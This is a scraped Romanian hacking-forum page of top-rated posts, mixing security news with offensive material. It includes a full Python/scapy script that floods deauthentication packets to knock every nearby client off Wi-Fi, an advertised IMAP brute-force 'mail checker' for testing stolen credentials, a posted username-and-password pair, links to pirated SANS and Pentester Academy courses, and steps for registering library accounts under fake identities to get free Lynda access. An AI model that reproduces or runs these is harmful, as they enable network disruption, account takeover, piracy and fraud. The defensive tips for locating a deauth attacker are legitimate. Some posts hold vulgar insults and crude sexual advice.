Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 10/12/18 in all areas

  1. 6 points
    Salut forum, as vrea sa adaugam niste linkuri de la Mega cu orice cursuri SANS (sau altele) pe care le mai gasiti pe net. O sa incep eu. Pentester Academy Abusing SQL Server Trusts in a Windows domain: https://mega.nz/#F!jjpmASIS!VTc_8DjGuExZBDv4E8-SwA SANS 642: https://mega.nz/#F!enwXQSib!uzuCIvly6E9t8cx8J1pN2Q!miAVhDKZ https://mega.nz/#F!enwXQSib!uzuCIvly6E9t8cx8J1pN2Q SANS SEC560 - 2017: https://mega.nz/#F!tO4TQbga!OvStyzKmOta6MEcZmesP7w SANS 555: https://mega.nz/#F!7KZw2AhR!hE-yr2rrxjRxpHgpt8pRGg SANS 760 vm: https://mega.nz/#!3QpCkDQA!qP24XpGeNGZ3_5EBaUULm2F23jyVbYuwP_0JDk097ts Pentester Academy cursuri: https://mega.nz/#F!2zZXwTzI!4wVK8DOAD-Dj8vsccvoKPg https://mega.nz/#F!CewXwASZ!SrQJtaL0MM9f8CqbvcqZGg Luati si adaugati cat sunt calde!
  2. 5 points
    WikiLeaks publishes a "Highly Confidential" internal document from the cloud computing provider Amazon. The document from late 2015 lists the addresses and some operational details of over one hundred data centers spread across fifteen cities in nine countries. Amazon, which is the largest cloud provider, is notoriously secretive about the precise locations of its data centers. While a few are publicly tied to Amazon, this is the exception rather than the norm. More often, Amazon operates out of data centers owned by other companies with little indication that Amazon itself is based there too or runs its own data centers under less-identifiable subsidiaries such as VaData, Inc. In some cases, Amazon uses pseudonyms to obscure its presence. For example, at its IAD77 data center, the document states that “Amazon is known as ‘Vandalay Industries’ on badges and all correspondence with building manager”. Amazon is the leading cloud provider for the United States intelligence community. In 2013, Amazon entered into a $600 million contract with the CIA to build a cloud for use by intelligence agencies working with information classified as Top Secret. Then, in 2017, Amazon announced the AWS Secret Region, which allows storage of data classified up to the Secret level by a broader range of agencies and companies. Amazon also operates a special GovCloud region for US Government agencies hosting unclassified information. Currently, Amazon is one of the leading contenders for an up to $10 billion contract to build a private cloud for the Department of Defense. Articol complet si doc: https://wikileaks.org/amazon-atlas/ ------------ @aelius de aia e Hetnix-ul ingropat prin Bailesti, e folosit de CIA
  3. 3 points
  4. 3 points
    Some of the most cutting-edge weapons in the US's military arsenal can be "easily hacked" using "basic tools", a government report has concluded. The Government Accountability Office (GAO) found "mission-critical" cyber-vulnerabilities in nearly all weapons systems tested between 2012 and 2017. That includes the newest F-35 jet as well as missile systems. ............. The report's main findings were: the Pentagon did not change the default passwords on multiple weapons systems - and one changed password was guessed in nine seconds a team appointed by the GAO was able to easily gain control of one weapons system and watch in real time as the operators responded to the hackers it took another two-person team only one hour to gain initial access to a weapons system and one day to gain full control many of the test teams were able to copy, change or delete system data with one team downloading 100 gigabytes of information Articol complet: https://www.bbc.co.uk/news/technology-45823180
  5. 2 points
    A fost publicata agenda completa: https://www.owasp.org/index.php/OWASP_Bucharest_AppSec_Conference_2018
  6. 2 points
    Weapon Systems Cybersecurity:DOD Just Beginning to Grapple with Scale of VulnerabilitiesGAO-19-128: Published: Oct 9, 2018. Publicly Released: Oct 9, 2018. United States Government Accountability Office Highlights of GAO, a report to the Committee on Armed Services, U .S. Senate poate merita o privire si National Cyber Strategy, the United States of America, SEPTEMBER 2018 si DEPARTMENT OF DEFENSE, CYBER STRATEGY, 2018
  7. 1 point
    Salut, daca il postezi aici ne putem uita peste el.
  8. 1 point
    zise cel cu o pereche de buci la avatar :))) fking retard 🖕
  9. 1 point
    Pune-ti parola aici si vezi daca a aparut pe undeva. https://haveibeenpwned.com/Passwords
  10. 1 point
    Primul venit, primul servit. Sa il folosesti cu placere. Cod: 39d30a19194ee94d5b58ebd852ec6164
  11. 1 point
    Salut, pot confirma, pe Chrome Version 69.0.3497.100 (Official Build) (64-bit) prima incarcare a site-ului nu se realizeaza cu succes, dupa refresh incarcandu-se normal.
  12. 1 point
    1. Intrati pe Cuyahoga County Public Library 2. Click pe "My Account" si apoi "Create Account" 2. Deschideti Fake Name Generator 3. Introduceti datele de pe Fake Name Generator in contul de Cuyahoga Library, cu doua mentiuni: puneti cod postal de Ohio si adresa de e-mail la care sa aveti acces. 4. Intrati pe E-Mail si copiati Acces Number-ul, dupa care va logati pe Cuyahoga County Public Library, introduceti doar Acces Number-ul, dupa care va pune sa va creati un PIN Number format din 4 cifre. 5. Intrati pe Lynda.com, selectati "Sign In", dupa care selectati "Sign in with your organization portal". Acolo introduceti link-ul de la librarie, dupa care Acces Number-ul si PIN-ul pe care tocmai vi l-ati ales. Si gata, aveti cont. Daca aveti intrebari, intrebati-ma in mod inteligent. Daca stiati deja asta, puteti sari peste topic. Nu stiu cat dureaza chestia asta, insa chiar si o luna daca aveti acces, este ok. Va ia maxim 5 minute sa creati tot ceea ce am explicat mai sus. Hai bafta. EDIT: Nu numai la Cuyahoga Library merge. Puteti intra pe Free Library si va alegeti de acolo o librarie, insa una care sa emita card online. Cu tot cu AN si PIN.
  13. 1 point
    Nu inteleg de ce naiba trebuie voi sa va legati de copiii care vor sa faca ceva, care vor mai mult decat sa frece menta pe CS GO si LOL. Dar stiu, avem mentalitatea asta legata de copii : "mici si prosti". @aurelL : si eu am fost la fel si mai toata lumea si-a "batut pula" de mine pe forumuri, dar totusi am gasit persoane care sa ma indrume si sa aiba rabdarea necesara sa ma ajute. Legat de limbaj de programare: depinde de ce ai vrea sa tu sa faci/creezi.
  14. 1 point
    1. Nu atragi femeile pentru ca esti prea speriat ca sa le atragi. 2. Nu Viagra este solutia in cazul tau, pentru ca in mod real, tu nu ai o problema de potenta, ci vine mai mult pe ordin psihic. Treaba este destul de simpla desi tu o vezi complicata acum. Iti faci prea multe griji si iti pui prea multe intrebari inainte de a se consuma actul in sine, de asta nici nu mai ajungi sa-ti bagi minerul cu casca roz in savarina. Incearca sa te relaxezi, sa stai mai mult in preajma femeilor, cu una anume e si mai bine, nu te musca. Cand mergi la o tarfa bea ceva inainte sa scapi de inhibitii si nu ti face griji daca termini repede. O tarfa nu o sa fie deranjata de asta ci doar daca nu i dai banii. La prima experienta sexuala nu eram speriat doar era ceva nou. Am baut cateva beri si apoi m-am suit pe animala. A durat ceva si din cauza bauturii nici nu am reusit sa mai termin. Dupa asta lucrurile pe planul asta au intrat in normal.
  15. 1 point
    Mai copilareste = mai umbla cu fete Daca vrei, da-mi maine PM si iti las niste comunitati foarte active de pe reddit si niste articole care te ajuta in problema ta. O sa vezi ca sunt milioane de oameni ca tine. Eu stiu tipi atractivi de iti vine sa-i futi din priviri ca baiat, dar care nu sunt in stare sa zica un cacat de pickup line sau sa ceara un numar de telefon. Ti-am zis, parerea mea e sa nu iei Viagra, ca nu ai o problema de potenta. Problema e ca nu poti mentina erectia pentru ca devii anxios pe parcursul actului. Dar incerc sa iti spun ca asta e la inceput, pana scapi de tracul ala. Unora le moare la intrare, altora nu li se scoala deloc. Dupa ce intelegi cauzele problemei, o sa iti vina mai usor sa le rezolvi. Iar cauza e increderea in sine. Si uneori laba. Vorbesc serios, daca dai pe laba mult e mai putin probabil sa ti se scoale asa usor si sa menti erectia. Incearca sa iei o pauza de la laba, o luna de abstinenta si o sa vezi ca ai coaiele mari si ti se scoala si cand te freci de cearceaf. Eu zic sa ii dai PM unei escorte de pe nimfomane de care iti place, si sa ii explici frumos situatia ta, ca ai 29 de ani, ca ai probleme cu increderea si ca esti virgin si o sa te primeasca cu placere. Cu fututul unei "femei normale" nu stiu ce sa iti spun. Invata tehnici de NPL, de inginerie sociala sau pur si simplu invata niste "vrajeala". Nu stiu daca nu futi o "femeie normala" te face un ratat. Unora nu le place jocul/nu sunt playeri (nu le place agatatul), altii nu au timp de agatat. I don't know. Dar nu prea vad ce treaba are asta cu stima de sine. Iar daca pentru tine are legatura cu stima de sine, inseamna ca ai valori gresite. P.S. Cumva sunt de acord cu @J (sorry pentru dislike, vroiam like), inafara de partea cu psihologul. Nu e RST chiar forumul potrivit pentru intrebarea asta, ca aici sunt o droaie de virgini cu acnee la 50 de ani, nu stiu cum te-ar putea ajuta astia.
  16. 1 point
    LOL. Dar zici ca e mare tragedie. A putut cineva sa futa din prima? Mie imi batea inima ca trenul si cred ca nici daca-i cantai nu se scula. Man up ca o sa fie bine. Parerea mea e sa fii un tip autosuficient. Daca ai chef de futai, apelezi la o escorta. Mai copilareste cativa ani si apoi cauta o nevasta. Dar cred ca inainte sa pui probleme de futut/inceput viata sexuala si altele, ar trebui sa cauti putin in tine si sa faci cumva sa scapi de anxietatea de orice fel. SI NU CU ALCOOL, cum au zis astia de mai sus.
  17. -1 points
    Salut @TEST101 eu iti recomand acest medicament pentru potenta sexuala Pastile Potenta - Tratament Potenta - Tianli Romania
  18. -1 points
    User:pass DraKesag <private>
  19. -1 points
  20. -1 points
    Download: imap brute checker password: blackos.net Work only without a proxy or SOCKS4 / SOCKS5 Yes, even though the title contains the phrase ALLMAILCHECKER , but I will not lie to it wrong, it all depends on the number of IMAP settings in the imapdatabase.cfg file (there are about 57k settings there now). The software works exclusively using the IMAP protocol, which means that when purchasing a proxy, pay attention to the prescription to the proxy or if there is no mention of this, check with the support if their proxy can work with the imap protocol, whether this feature is blocked. The software searches for letters using 2 methods: 1 fast (less efficient) using search by sender with one request (as in all mail you just type in @ ea.com press Enter and it gives the result). 2 Long (more efficient) using the passage through all the letters in search of the sender you need. (use forced search to activate this search method) Why 2 methods? It’s just that not all IMAP servers support the first method, so you probably noticed in similar software (not all starjieu have a special thank you for you. I didn’t skip such mails, I implemented the second method, but it takes much longer to check than the first one, because I have to go through all the letters, there’s a limit to how many emails you can get for this.
  21. -1 points
    BUNA!Are cineva o invitatie filelist? Multumesc.
  22. -1 points
    How to burn down any wireless network around you and how to find out the exact location of a wireless laptop I made a program which will monitor the air for connections between wireless hot spots and hosts, if the program will find a connection it will send a deauth packet which will disconnect the client, this goes at such a high speed that clients will have no chance to establish a proper connection to the router. #!/usr/bin/python try: import sys,os from scapy.all import * except: print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed" sys.exit(0) def deauth_flood(p): if p.haslayer(Dot11): mac = {} mac["ap"]=p.sprintf("%Dot11.addr1%") mac["station1"]=p.sprintf("%Dot11.addr2%") if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None": os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")# Remove " &" for a slower attack rate. def instructions(): print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n" print "python "+sys.argv[0]+" [iface]" print "python "+sys.argv[0]+" mon0" if len(sys.argv)>1: print "[+] Searching for packets..." sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood)) else: sys.exit(instructions()) Use at your own risk, you won’t be detected too fast since you send entirely spoofed packets but with the right equipment and skills on the side of the victim side he will be able to do it, normally when these kinds of attacks are launched at company’s they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what when you are being targeted by this attack? First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about: - Attacker is at 1 location not too far away; for example in a car - Moving attacker walking around with a laptop in bag - Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case - Malicious pineapples - Phones (like the iphone) - Satellite dish pointed to you - Infected satellite Understand that it is impossible to counter some of these attacks but an iphone or car should be tracable. Requirements: - Movable Linux based PC with wireless capability; if you don’t have a *nix system you can download backtrack for free, burn it to a DVD and boot from it; in the case your PC can’t boot DVD’s you can go for an Ubuntu live CD or another distribution, booting from these CD’s won’t change anything to your actual system. - Wireshark (free) - Aircrack-ng (free) optional: - poitable antenna - thin foil - scissors - glue - cardboard (or other hard bendable material) Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take for localizing the attacker. You can make the windsurfer or be creative and make something custom, the idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it to increase your range and elimate the chance of the attacker being behind the antenna. When you have all requirements you can get started, move in the middle of the deauth packets storm and turn on Wireshark & airodump-ng. In wireshark apply “radiotap.length==13? as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng. Look at the rate with which you capture deauth packets and look in the bottom fields for the connections between routers and hosts, look at the PWR levels here. Now move the windsurfer 90 degrees and look at the rate at which you capture and the deauth packets now, decide if it was less or more, redo this progress until you find the location at where the deauth packets have the highest rate, when being in a building it would be smart to also look under and above you. Once you localized the location where the most deauth packets came from move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng. Once you are very very close you can determine which MAC address is doing this by looking it up in airodump-ng, this machine at that moment will have a very low PWR (0 until -50 is good enough). Now run this command in bash to determine the manufacture of the card so you know something more about the attacking machine. cat `locate manuf` | grep 00:11:22 Replace the latest part with the first part of the MAC address for example when you found the MAC address 55:44:33:22:11:00 then 55:44:33 is the part you will need. Please note that this MAC address can be spoofed and/or not broadcasting so you won’t be able to see it, then you have to do it all with Wireshark and determine where the most packets come from. After you did all this you can just grab that malicious pineapple and smash it as hard as you can. This cheap attack vector can form a high risk level during war, when properly exploited an army can attack an entire city by pointing a satellite dish in their direction or think about an attacker which takes over a satellite and reprograms it to be able to do these kind of attacks, with these techniques it will be hard to prevent those attacks unless we will make big thin foil shields around our city’s. I gave you some basic solutions to find the attacker but this antenna detection way works great also for other means, i once tried this on a friend of mine in my old school to find out his location, it was a multi floor school building and i had no idea where he was, within 15 minutes i found him. //care-l testeaza ? How to burn down any wireless network around you and how to find out the exact location of a wireless laptop
  23. -1 points
    Bată-te singur cu pula de la negru, altfel iti trag doua palme de te invarti ca titirezu. PS. Ti-am trimis contul in Pm.
  24. -1 points
    ma de unde ai tu shell-ul ala? fututi gura mat-tii
  25. -1 points
    las ca va zic eu, futu-l in gura sa-=l sparg
×